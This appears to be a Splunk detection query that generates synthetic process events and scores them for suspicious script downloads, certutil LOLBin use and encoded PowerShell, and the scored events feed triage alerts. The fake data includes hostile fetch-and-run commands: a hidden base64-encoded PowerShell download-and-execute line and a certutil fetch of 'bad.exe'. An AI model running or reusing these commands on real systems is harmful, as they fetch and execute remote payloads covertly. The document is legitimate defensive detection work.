| makeresults count=220
| streamstats count as n
| eval base=relative_time(now(),"@d")
| eval user=case(n<=120,"alice", n<=190,"adminsvc", true(),"jdoe")
| eval host=case(user="jdoe","ENG-LAPTOP-2", user="adminsvc","IT-JUMPBOX-1", true(),"OPS-PC-3")
| eval _time=case(user="jdoe", base + 23*3600 + (n%1800), true(), base + 11*3600 + (n%1800))
| eval Image=case(n%4=0,"powershell.exe", n%4=1,"cmd.exe", n%4=2,"certutil.exe", true(),"powershell.exe")
| eval CommandLine=case(
    user="adminsvc" AND Image="powershell.exe","powershell.exe -Command Invoke-WebRequest https://microsoft.com/script.ps1 -OutFile C:\\temp\\ok.ps1",
    user="adminsvc" AND Image="certutil.exe","certutil.exe -urlcache -f https://download.microsoft.com/file.txt C:\\temp\\file.txt",
    user="jdoe" AND Image="powershell.exe","powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnaAB0AHQAcABzADoALwAvAGQAcgBvAHAAcABvAHgALgBjAG8AbQAvAGIAYQBkACcAKQA=",
    user="jdoe" AND Image="certutil.exe","certutil.exe -urlcache -f https://dropbox.com/bad.exe C:\\Users\\Public\\bad.exe",
    true(),"powershell.exe -Command Invoke-WebRequest https://example.com/test.txt -OutFile C:\\temp\\test.txt"
  )
| eval cl=lower(CommandLine)
| eval enc_flag=if(match(cl,"\\-enc\\s|frombase64string"),1,0)
| eval lolbin_flag=if(match(cl,"certutil\\.exe\\s+\\-urlcache"),1,0)
| eval download_flag=if(match(cl,"invoke-webrequest|iwr|downloadstring"),1,0)
| eval risky_domain_flag=if(match(cl,"dropbox\\.com|mega\\.nz|drive\\.google\\.com|pastebin\\.com"),1,0)
| eval allow_admin_flag=if(user="adminsvc" AND host="IT-JUMPBOX-1",1,0)
| eval risk=(enc_flag*40) + (lolbin_flag*30) + (download_flag*15) + (risky_domain_flag*25)
| where allow_admin_flag=0 AND risk>=55
| eval alert_title="Suspicious script download / encoded execution"
| eval severity=case(risk>=80,"high", risk>=55,"medium", true(),"low")
| eval recommended_action=case(severity="high","Escalate + preserve evidence + pivot to child processes/network",
                               severity="medium","Limited inquiry + validate user context + check follow-on actions",
                               true(),"Monitor")
| table _time alert_title severity user host Image CommandLine risk recommended_action
| sort -risk
